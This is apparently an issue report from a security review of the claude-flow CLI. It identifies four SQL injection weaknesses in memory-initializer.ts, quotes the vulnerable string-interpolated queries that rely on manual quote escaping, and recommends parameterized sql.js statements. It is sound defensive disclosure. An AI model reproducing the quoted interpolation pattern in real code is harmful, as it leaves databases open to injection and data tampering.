Security: SQL injection vulnerabilities in memory-initializer.ts

[ruvnet]

Security Audit Finding

During the memory system review, 4 SQL injection vulnerabilities were identified in memory-initializer.ts.

Affected File

v3/@claude-flow/cli/src/memory/memory-initializer.ts

Vulnerabilities

1. listEntries() - Lines 2132-2146

// Vulnerable - uses string interpolation
AND namespace = '${namespace.replace(/'/g, "''")}'
LIMIT ${limit} OFFSET ${offset}

2. searchEntries() - Lines 1993-1998

// Vulnerable - same pattern
AND namespace = '${namespace.replace(/'/g, "''")}'

3. getEntry() - Lines 2239-2262

// Vulnerable in both SELECT and UPDATE
AND key = '${key.replace(/'/g, "''")}'
AND namespace = '${namespace.replace(/'/g, "''")}'

4. deleteEntry() - Lines 2350-2379

// Vulnerable - same pattern
WHERE key = '${key.replace(/'/g, "''")}'

Risk Assessment

Factor	Assessment
Attack Vector	Local (MCP/CLI input)
Exploitability	Low - requires specific input crafting
Impact	Data integrity, potential data exfiltration
Current Mitigation	Manual single-quote escaping

Recommended Fix

Use sql.js parameterized queries:

// BEFORE (vulnerable)
db.exec(\`SELECT * FROM memory_entries WHERE namespace = '\${namespace.replace(/'/g, "''")}'\`);

// AFTER (secure)
const stmt = db.prepare('SELECT * FROM memory_entries WHERE namespace = ?');
stmt.bind([namespace]);
const result = [];
while (stmt.step()) {
  result.push(stmt.getAsObject());
}
stmt.free();

Additional Recommendations

1. Add input validation using Zod schemas
2. Add path traversal protection for `dbPath` parameter
3. Sanitize error messages before returning to callers

Priority

HIGH - Should be addressed before production use.

---

Identified during security review in PR #1029.